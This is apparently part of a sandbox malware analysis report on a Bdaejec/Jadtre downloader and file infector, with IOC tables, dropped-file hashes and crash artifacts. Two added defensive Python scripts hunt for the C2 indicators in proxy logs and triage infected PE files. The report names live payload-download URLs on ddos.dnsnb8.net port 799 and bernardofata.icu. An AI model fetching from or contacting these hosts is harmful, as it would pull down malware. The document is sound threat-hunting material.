                    • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
20:51:38 | API Interceptor | 2x Sleep call for process: WerFault.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
44.221.84.105 | BUG32.exe | malicious | Bdaejec | ddos.dnsnb8.net:799/cj//k1.rar
44.221.84.105 | 7Y18r(216).exe.dll | malicious | Bdaejec, Sality | ddos.dnsnb8.net:799/cj//k1.rar
44.221.84.105 | A9095F44928219267930271D2AD000C7B2F7F2616DB4AD186E5D3AA283D14764.exe | malicious | Babuk, Bdaejec, Djvu | ddos.dnsnb8.net:799/cj//k1.rar
44.221.84.105 | BUG32.exe | malicious | Bdaejec | ddos.dnsnb8.net:799/cj//k2.rar
44.221.84.105 | builder_Release.exe | malicious | Bdaejec | ddos.dnsnb8.net:799/cj//k1.rar
44.221.84.105 | BOTBINARY.EXE.exe | malicious | Bdaejec | ddos.dnsnb8.net:799/cj//k4.rar
44.221.84.105 | BkPack.exe | malicious | Bdaejec | ddos.dnsnb8.net:799/cj//k3.rar
44.221.84.105 | DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe | malicious | Babuk, Bdaejec, Djvu, Zorab | ddos.dnsnb8.net:799/cj//k1.rar
44.221.84.105 | E9E758383C0F518C4DBD1204A824762F5FAC37375D8C5695C749AD1C36C0F108.exe | malicious | Babuk, Bdaejec, Djvu, Zorab | ddos.dnsnb8.net:799/cj//k5.rar
44.221.84.105 | dllhost.exe | malicious | Bdaejec | ddos.dnsnb8.net:799/cj//k1.rar

Match | Associated Sample Name / URL | Detection | Threat Name | Context
ddos.dnsnb8.net | BUG32.exe | malicious | Bdaejec | 44.221.84.105
ddos.dnsnb8.net | 7Y18r(212).exe | malicious | Bdaejec | 44.221.84.105
ddos.dnsnb8.net | 7Y18r(216).exe.dll | malicious | Bdaejec, Sality | 44.221.84.105
ddos.dnsnb8.net | A9095F44928219267930271D2AD000C7B2F7F2616DB4AD186E5D3AA283D14764.exe | malicious | Babuk, Bdaejec, Djvu | 44.221.84.105
ddos.dnsnb8.net | BUG32.exe | malicious | Bdaejec | 44.221.84.105
ddos.dnsnb8.net | builder_Release.exe | malicious | Bdaejec | 44.221.84.105
ddos.dnsnb8.net | A9BCD8D127BE95C64EDAE5CDD2379494A37D458FD9D5881D74F8D5487A805E6C.exe | malicious | Bdaejec, SmokeLoader | 44.221.84.105
ddos.dnsnb8.net | BOTBINARY.EXE.exe | malicious | Bdaejec | 44.221.84.105
ddos.dnsnb8.net | BkPack.exe | malicious | Bdaejec | 44.221.84.105

Match | Associated Sample Name / URL | Detection | Threat Name | Context
AMAZON-AESUS | BUG32.exe | malicious | Bdaejec | 44.221.84.105
AMAZON-AESUS | 7Y18r(216).exe.dll | malicious | Bdaejec, Sality | 44.221.84.105
AMAZON-AESUS | A9095F44928219267930271D2AD000C7B2F7F2616DB4AD186E5D3AA283D14764.exe | malicious | Babuk, Bdaejec, Djvu | 44.221.84.105
AMAZON-AESUS | BUG32.exe | malicious | Bdaejec | 44.221.84.105
AMAZON-AESUS | builder_Release.exe | malicious | Bdaejec | 44.221.84.105
AMAZON-AESUS | BOTBINARY.EXE.exe | malicious | Bdaejec | 44.221.84.105
AMAZON-AESUS | BkPack.exe | malicious | Bdaejec | 44.221.84.105
AMAZON-AESUS | DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe | malicious | Babuk, Bdaejec, Djvu, Zorab | 44.221.84.105
AMAZON-AESUS | E9E758383C0F518C4DBD1204A824762F5FAC37375D8C5695C749AD1C36C0F108.exe | malicious | Babuk, Bdaejec, Djvu, Zorab | 44.221.84.105
AMAZON-AESUS | dllhost.exe | malicious | Bdaejec | 44.221.84.105

No context

Match | Associated Sample Name / URL | Detection | Threat Name | Context
C:\Users\user\AppData\Local\Temp\WuiXLS.exe | 7Y18r(212).exe | malicious | Bdaejec |
C:\Users\user\AppData\Local\Temp\WuiXLS.exe | 7Y18r(216).exe.dll | malicious | Bdaejec, Sality |
C:\Users\user\AppData\Local\Temp\WuiXLS.exe | 7Y18r(223).exe | malicious | Bdaejec |
C:\Users\user\AppData\Local\Temp\WuiXLS.exe | builder_Release.exe | malicious | Bdaejec |
C:\Users\user\AppData\Local\Temp\WuiXLS.exe | A9BCD8D127BE95C64EDAE5CDD2379494A37D458FD9D5881D74F8D5487A805E6C.exe | malicious | Bdaejec, SmokeLoader |
C:\Users\user\AppData\Local\Temp\WuiXLS.exe | BOTBINARY.EXE.exe | malicious | Bdaejec |
C:\Users\user\AppData\Local\Temp\WuiXLS.exe | BkPack.exe | malicious | Bdaejec |
C:\Users\user\AppData\Local\Temp\WuiXLS.exe | bss.exe | malicious | Bdaejec |
C:\Users\user\AppData\Local\Temp\WuiXLS.exe | C0ED98D08381257B540A04C0868ECD6A628649AA70FEBCBE03778BAE532FB5BE.exe | malicious | Bdaejec, BitCoin Miner, Xmrig |
C:\Users\user\AppData\Local\Temp\WuiXLS.exe | builder_Release.exe | malicious | Bdaejec |
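The network indicators in the tables above (the ddos.dnsnb8.net / 44.221.84.105 downloader on TCP 799 fetching /cj//k1.rar, the k1..k5 variants seen across related samples, and the second URL from the extracted configuration, bernardofata.icu/40d570f44e84a454.php) are what a responder would hunt for in proxy and DNS telemetry. The script below is an added example written for this page, not part of the Joe Sandbox report: it turns those indicators into a matcher and runs it over a few constructed proxy log lines. The log format (timestamp, client, destination host:port, method, URL) is an assumption chosen for the demonstration; the indicator values themselves are copied from the report.

```python
"""Hunt for the C2 indicators of this report in proxy/DNS-style log lines.

Added example, not part of the sandbox report. Indicator values come from the
report tables; SAMPLE_LOG is CONSTRUCTED test data, not observed traffic.
"""
import ipaddress
import re
from urllib.parse import urlsplit

# Network indicators taken from the report.
C2_DOMAINS = {"ddos.dnsnb8.net", "bernardofata.icu"}
C2_IPS = {ipaddress.ip_address("44.221.84.105")}
C2_PORTS = {799}                       # non-standard HTTP port used by the downloader
# The downloader fetches /cj//k<N>.rar (k1..k5 appear across related samples);
# the second pattern is the .php URL from the extracted configuration.
C2_PATHS = [re.compile(r"^/cj//k\d\.rar$"), re.compile(r"^/40d570f44e84a454\.php$")]

# Hypothetical log layout assumed for this example:
# "<ts> <client> <dst_host_or_ip>:<port> <method> <url>"
LOG_RE = re.compile(
    r"^(?P<ts>\S+) (?P<src>\S+) (?P<dst>[^:\s]+):(?P<port>\d+) (?P<method>\S+) (?P<url>\S+)$"
)


def check_url(url: str) -> list:
    """Return the reasons a URL matches the report's indicators (empty list if none)."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    try:
        port = parts.port
    except ValueError:          # malformed port in the URL
        port = None
    reasons = []
    if host in C2_DOMAINS:
        reasons.append(f"c2-domain:{host}")
    try:
        if ipaddress.ip_address(host) in C2_IPS:
            reasons.append(f"c2-ip:{host}")
    except ValueError:          # host is a name, not an IP literal
        pass
    if port in C2_PORTS:
        reasons.append(f"c2-port:{port}")
    for pat in C2_PATHS:
        if pat.match(parts.path):
            reasons.append(f"c2-path:{parts.path}")
    return reasons


def scan_proxy_log(lines) -> list:
    """Return [(line_number, reasons)] for every parsable line touching an indicator."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = LOG_RE.match(line.strip())
        if not m:
            continue            # unparsable line: skip rather than crash the hunt
        reasons = check_url(m["url"])
        dst, port = m["dst"].lower(), int(m["port"])
        # Destination columns catch traffic whose URL field lacks a host (e.g. CONNECT).
        if dst in C2_DOMAINS and f"c2-domain:{dst}" not in reasons:
            reasons.append(f"c2-domain:{dst}")
        if port in C2_PORTS and f"c2-port:{port}" not in reasons:
            reasons.append(f"c2-port:{port}")
        if reasons:
            hits.append((n, reasons))
    return hits


# CONSTRUCTED sample log lines (not real traffic); line 2 is benign, line 5 is noise.
SAMPLE_LOG = [
    "2024-07-26T00:51:20Z 10.0.0.15 ddos.dnsnb8.net:799 GET http://ddos.dnsnb8.net:799/cj//k1.rar",
    "2024-07-26T00:51:21Z 10.0.0.15 www.lua.org:80 GET http://www.lua.org/",
    "2024-07-26T00:51:25Z 10.0.0.15 44.221.84.105:799 GET http://44.221.84.105:799/cj//k3.rar",
    "2024-07-26T00:51:30Z 10.0.0.15 bernardofata.icu:80 POST http://bernardofata.icu/40d570f44e84a454.php",
    "garbage line that does not parse",
]

if __name__ == "__main__":
    for n, reasons in scan_proxy_log(SAMPLE_LOG):
        print(f"line {n}: {', '.join(reasons)}")
```

Matching on the destination host and port as well as on the URL matters here: the downloader talks to a non-standard port, so a CONNECT or raw-TCP record with no URL path still surfaces through the port and IP columns even after the domain changes.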
                                        Process:C:\Users\user\AppData\Local\Temp\WuiXLS.exe
                                        File Type:MS-DOS executable PE32 executable (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):19456
                                        Entropy (8bit):6.590617265551709
                                        Encrypted:false
                                        SSDEEP:384:1FpSPXZQaD7U8iu4YsAa7ZA0UvH2lsRv21yW7GbAxur6+Y9PffPz:MRQGPL4vzZq2o9W7GsxBbPr
                                        MD5:5DD5E8954472C433520EC6945EF48D18
                                        SHA1:4FB35D158F3BC6FA8FDF24D7627A769B469AE13D
                                        SHA-256:0746E902413AC4EDDF1DD4043F23A0F1E926E660987254899DCDBB347C033581
                                        SHA-512:00B3E0EA5B1692DF37EB420AAC43A63FA17737771F3377D32B6997954EDE06FC7F3CA7E65B478D1AF527A704CEDD46BB32FB7B1D1ECC0CDB1E6C4CFA0BC2A1E7
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Avira, Detection: 100%
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        Reputation:low
                                        Preview:MZ..........................................................@...PE..L....................................0............................................................................................... ..l...........................................................................................................PELIB...............................`....rsrc........ ......................@..@..Y|.uR..P...0...B.................. ...................................................................................j.h"...h....j...(....Hello World!.MyProg........................................................................................................................................................................................................................(...........0...(.......................;.......User32.dll...MessageBoxA................................................................................................dummy.exe.....................TestExport.CallPlz................
                                        Process:C:\Users\user\AppData\Local\Temp\WuiXLS.exe
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Category:modified
                                        Size (bytes):2389504
                                        Entropy (8bit):6.731344336459406
                                        Encrypted:false
                                        SSDEEP:49152:BGSXoV72tpV9XE8Wwi1aCvYMdRluS/fYw44RxL:V4OEtwiICvYMpf
                                        MD5:4C6F3B94A176D722328CB44FC0A4EEB3
                                        SHA1:A6C6B1F359D8670A877FDDBD3D918DF906D571D1
                                        SHA-256:936263015B621BD3211A2824C2558FC983280CC663C5C8433DA3D7DD60E8551C
                                        SHA-512:F984AEB9AAAA92144D561AC0F336B12A2FED0110F622DC7CDAB25A36395749FCAC087C2D9093F964307F915A5BF144CB28432C366CC1DA6D1F9362F1C478252B
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Avira, Detection: 100%
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        Reputation:low
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Ark.Ark.Ark...o.Mrk...h.Jrk...n.^rk...j.Erk.H...Brk.H...nrk.Arj..pk...b.rk...k.@rk.....@rk...i.@rk.RichArk.........................PE..L.....(c.....................~.......p$...........@...........................$...........@.........................p...<............@ ......................P#.....@...p...................P...........@............................................text...e........................... ..`.rdata...^.......`..................@..@.data...`....0......................@....rsrc........@ ....... .............@..@.reloc.......P#......"#.............@..B.....u...P...p$..B...4$............. ...........................................................................................................................................................................................................................................................
                                        Process:C:\Users\user\AppData\Local\Temp\WuiXLS.exe
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):31744
                                        Entropy (8bit):6.365978439038225
                                        Encrypted:false
                                        SSDEEP:768:uWQ3655Kv1X/qY1MSdgtQGPL4vzZq2o9W7GsxBbPr:uHqaNrFdgaGCq2iW7z
                                        MD5:00E6AA046C6B3F8C7416501E743B72BC
                                        SHA1:77BA8DCDD2B73F20D953D6BAF4DEE41D31AF2F40
                                        SHA-256:FCBB9E68B0F4F1B598801C58542B6F940A47F366472614338E795AC6A9EDA262
                                        SHA-512:56CCC930C3AB9A81E2141AA493C7C27A389D09BA5E5EB33A5B5A1E6DF85168E1774D3FDC35D6C4E6D8DF8A35FA7E9BB8933234FA1273C566F873D0EE598811D9
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Avira, Detection: 100%
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        Reputation:low
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.6...X...X...X.x.R...X..V...X.x.\...X......X...Y.W.X......X.!.R...X...^...X.Rich..X.................PE..L...pN.d........../......V...@.......p.......0....@.........................................................................$9.......`...............................................................................0...............................text............................... ..`.rdata.......0......................@..@.data...X....@.......(..............@....rsrc........`.......*..............@..@.EpN.uZ..P...p...B...:.............. ...................................................................................................................................................................................................................................................................................................................................
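The three PE files above are existing Program Files executables that WuiXLS.exe rewrote (the 2389504-byte one is listed as Category: modified), which is why they carry the same Jadtre verdict as the sample. When a file infector touches a binary, the usual giveaways are a code section that has become writable, an entry point that no longer lies in a standard code section, and a section name made of non-printable bytes. The script below is an added example, not the report's own tooling: it parses just enough of the PE header with the standard library to run those three checks. The image built by build_pe() is constructed for the demonstration and is not one of the files listed in the report.

```python
"""Triage checks for PE files modified by a file infector.

Added example, not from the sandbox report. build_pe() produces a CONSTRUCTED
header-only PE32 image for testing; it is not any file from the report.
"""
import struct

IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
STANDARD_CODE_SECTIONS = {".text", "CODE", ".code", "INIT"}


def parse_sections(data: bytes):
    """Return (entry_point_rva, [(name, virtual_address, virtual_size, characteristics), ...])."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    nsections = struct.unpack_from("<H", data, coff + 2)[0]
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]
    opt = coff + 20
    entry = struct.unpack_from("<I", data, opt + 16)[0]   # AddressOfEntryPoint (PE32 and PE32+)
    sections, off = [], opt + opt_size
    for _ in range(nsections):
        raw_name, vsize, vaddr = struct.unpack_from("<8sII", data, off)
        chars = struct.unpack_from("<I", data, off + 36)[0]
        sections.append((raw_name.rstrip(b"\0"), vaddr, vsize, chars))
        off += 40                                          # IMAGE_SECTION_HEADER size
    return entry, sections


def triage(data: bytes) -> list:
    """Return human-readable findings; an empty list means none of the three checks fired."""
    entry, sections = parse_sections(data)
    findings = []
    for name, vaddr, vsize, chars in sections:
        text = name.decode("latin-1")
        if text == ".text" and chars & IMAGE_SCN_MEM_WRITE:
            findings.append("writable .text section")
        if not all(0x21 <= b <= 0x7E for b in name):       # non-printable or space in name
            findings.append(f"section name with special chars: {name!r}")
        if vaddr <= entry < vaddr + vsize and text not in STANDARD_CODE_SECTIONS:
            findings.append(f"entry point 0x{entry:x} lies in non-standard section {text}")
    if not any(v <= entry < v + s for _, v, s, _ in sections):
        findings.append(f"entry point 0x{entry:x} outside every section")
    return findings


def build_pe(sections, entry_rva: int) -> bytes:
    """Build a minimal header-only PE32 image (CONSTRUCTED test data, no real code).

    sections: list of (name: bytes, virtual_address, virtual_size, characteristics).
    """
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    opt_size = 224                                          # PE32 optional header
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_size, 0x0102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)                   # PE32 magic
    struct.pack_into("<I", opt, 16, entry_rva)              # AddressOfEntryPoint
    hdrs = b"".join(
        struct.pack("<8sIIIIIIHHI", n.ljust(8, b"\0"), vs, va, 0, 0, 0, 0, 0, 0, ch)
        for n, va, vs, ch in sections
    )
    return dos + b"PE\0\0" + coff + bytes(opt) + hdrs


if __name__ == "__main__":
    # Constructed infected-looking image: writable .text, junk-named last section holding the EP.
    infected = build_pe(
        [(b".text", 0x1000, 0x500, IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE),
         (b".rsrc", 0x2000, 0x100, IMAGE_SCN_MEM_READ),
         (b"\x01\xf0ab", 0x3000, 0x800, IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE)],
        0x3010,
    )
    for finding in triage(infected):
        print(finding)
```

Run triage() over the files a host reports as modified and treat any finding as a reason to hash the file and compare it with the report's dropped-file hashes; a clean linker output normally produces no findings, so the checks are cheap to apply across a whole Program Files tree.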
                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):65536
                                        Entropy (8bit):0.7788669724727739
                                        Encrypted:false
                                        SSDEEP:192:nFbspr54OYA0tbGyjjTzuiFDZ24IO8+q:F+t4OYbtbGyj3zuiFDY4IO8+
                                        MD5:A3F8639B2251E1D941F7D583E0644A59
                                        SHA1:0B02007AA291B606DB62203850AF7BBA3BB270F2
                                        SHA-256:CA50F93F3C4F28051EA0AA324B746A869DD5B1213D8D3167DE939CFFC6C5D349
                                        SHA-512:20F5988956FF46C22D88560C8B0956C8FD87BD5D7F2EDF4951691F86B7A62D41A468608FD005D40CE55B1B451F886A480F423B787431C99808C8315C0091CDE8
                                        Malicious:true
                                        Reputation:low
                                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.6.4.2.8.6.9.4.4.0.5.7.1.1.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.6.4.2.8.6.9.4.7.1.8.2.1.7.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.2.e.7.2.f.6.e.-.a.e.3.a.-.4.a.6.1.-.b.f.4.5.-.e.c.1.2.7.f.f.b.6.7.c.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.f.4.1.c.b.f.4.-.5.8.6.5.-.4.a.d.c.-.a.9.5.f.-.9.8.6.a.8.5.3.c.4.8.1.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.7.Y.1.8.r.(.1.9.3.)...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.3.0.-.0.0.0.1.-.0.0.1.4.-.f.9.5.6.-.6.a.f.2.f.5.d.e.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.9.1.c.f.a.5.0.e.7.a.a.7.e.4.b.d.d.2.4.6.6.8.2.8.3.9.9.1.1.9.2.e.0.0.0.0.f.f.f.f.!.0.0.0.0.0.9.7.5.4.9.6.8.7.2.2.7.3.1.f.b.2.0.8.d.d.b.e.b.c.c.6.c.6.a.7.c.c.9.d.4.2.c.7.b.!.7.Y.1.8.r.(.1.9.3.)...e.x.e.....T.a.r.g.e.t.A.p.p.
                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):65536
                                        Entropy (8bit):0.9230343872783822
                                        Encrypted:false
                                        SSDEEP:192:ufgSTbDh602EJo+jkfBzuiFDZ24IO8skr:ufPvDhB26o+jKzuiFDY4IO8s
                                        MD5:752119478B65B653E5E532208197240B
                                        SHA1:2F890A705D3E9331ED71A1EB4A8BB41A518243E7
                                        SHA-256:73BB0F095A2642E718BED2F99779C4F2B22955663973860F023733081265C1ED
                                        SHA-512:B092D23869009779BE0F4EF90ED8BA7D744585E32BDF957207D94F1AA3A2F25192B25B07A650980B03005BF400565842CDC0662C2AEA73C87602CDD7DCABA37A
                                        Malicious:false
                                        Reputation:low
                                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.6.4.2.8.6.9.3.1.4.2.2.3.2.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.6.4.2.8.6.9.4.0.9.5.3.6.8.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.3.c.c.0.7.d.0.-.1.3.4.f.-.4.7.2.c.-.b.0.c.4.-.f.d.0.5.e.1.8.d.9.4.7.a.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.1.a.7.7.a.d.1.-.9.c.f.2.-.4.d.f.8.-.a.e.d.e.-.4.d.9.2.9.8.e.2.e.a.e.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.W.u.i.X.L.S...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.4.8.-.0.0.0.1.-.0.0.1.4.-.9.d.d.1.-.7.9.f.2.f.5.d.e.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.5.3.6.0.2.4.0.9.1.6.9.f.c.8.d.a.1.7.a.d.a.b.4.2.d.0.1.c.7.6.4.c.0.0.0.0.f.f.f.f.!.0.0.0.0.d.4.e.9.e.f.1.0.d.7.6.8.5.d.4.9.1.5.8.3.c.6.f.a.9.3.a.e.5.d.9.1.0.5.d.8.1.5.b.d.!.W.u.i.X.L.S...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.1.3.
                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                        File Type:Mini DuMP crash report, 14 streams, Fri Jul 26 00:51:33 2024, 0x1205a4 type
                                        Category:dropped
                                        Size (bytes):156746
                                        Entropy (8bit):1.8052572905135291
                                        Encrypted:false
                                        SSDEEP:384:8GZk5DBVAfzd6i0GqEz5lb3UMr2+ZO5BCgb7azHyn1aRD28oyk:8G29BVO8i1SSOzxSSWD1O
                                        MD5:3BF2EFF05297EF21E0B2D99BCB594818
                                        SHA1:CE583F1F2A32182B6F75610DA334B15E64C06BA7
                                        SHA-256:A3FBA04B6FC2CA0BED3A79298A188125B4D43269D2C40A0B03A1D4B9B6F3B737
                                        SHA-512:3A4F32A3B3EE488794026AC3D3ED00FF35E1887327795F1107E365AEF6AD86A997BB1113356CAB12AC7279F2895D700D30AA6DF85E1464C44D1BD72CABBF74AF
                                        Malicious:false
                                        Reputation:low
                                        Preview:MDMP..a..... .........f............t...............|.......d...fL..........T.......8...........T............7...,..........T...........@...............................................................................eJ..............GenuineIntel............T.......H.....f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):8258
                                        Entropy (8bit):3.700485499807649
                                        Encrypted:false
                                        SSDEEP:192:R6l7wVeJJJ6E6YwN61IkG4gmfmJtpDM89bJVsfeDm:R6lXJH6E6Ya61IkZgmfmPJufL
                                        MD5:E4DB9B40A92B7217E3B46CB0E08A704C
                                        SHA1:843B7A11832D72EE530085F335DA25E1338FFBE6
                                        SHA-256:8318601B82DFC3CE3F95020FD774ACA3BB76C829DF2F5E848C4C678EBA3E5AC5
                                        SHA-512:E7935F16986DA4341E5BC22E1B5C4D124D5DC69DEBCE8747CA94E74E46F2C66748EFCFF213096E9227667DDB2310EE51891582975F487B01ADD1CEEABE56C245
                                        Malicious:false
                                        Reputation:low
                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.4.9.6.<./.P.i.
                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):4551
                                        Entropy (8bit):4.456878638243328
                                        Encrypted:false
                                        SSDEEP:48:cvIwWl8zsNJg77aI99qWpW8VYjYm8M4JkdFvW4+q8oHsXg/xd:uIjfnI77L7VjJSlUg/xd
                                        MD5:1653ADE7D42D516B209FA43D314AB6F2
                                        SHA1:018D5F1211883F96E93C8E70C780B077B54988BD
                                        SHA-256:41A1ED95139A2F4EE4C3AE8970BC9B0AC3FE7C6B12666ECE6A39076C05068294
                                        SHA-512:20A486F71D515DE6EB496F15430A012BE44E61C9B1A8F4FD20355C7866CD19D2B62B8617769D918177773AF3D937DE8722FF1318162CEBA25E4335F50B264F77
                                        Malicious:false
                                        Reputation:low
                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="427194" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                        File Type:Mini DuMP crash report, 14 streams, Fri Jul 26 00:51:34 2024, 0x1205a4 type
                                        Category:dropped
                                        Size (bytes):24064
                                        Entropy (8bit):2.495191834009757
                                        Encrypted:false
                                        SSDEEP:96:5Q80w3OSnmZq0XxEsrXoJgPMxgLlHJi7Yvc79w0rhE15w3Ra7iSlK5WIkWI1MInQ:Z09rX8gE2OYUhwimcElKJGoyikIL
                                        MD5:755FD6EF8FB6799F4EB10E49344C5B49
                                        SHA1:162575BF487966BCDCD725D6CA8B111D537E3BFA
                                        SHA-256:20FA80B827A3646781CB0CDF4F14D7AAB8E7E41594A0A5139EEA5F4A5B717580
                                        SHA-512:C5C477145F4109B0C428B5A83BA29C2DFB8F99CF24F1DD5F4B0FB1B86D0C2309597624E9A8D520DFC360B9EA72A6734189F14B00AB33D735C65208102150CC4A
                                        Malicious:false
                                        Reputation:low
                                        Preview:MDMP..a..... .........f............4...............<...........J...........T.......8...........T...............xI..........8...........$...............................................................................eJ..............GenuineIntel............T.......0.....f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Windows\SysWOW64\WerFault.exe
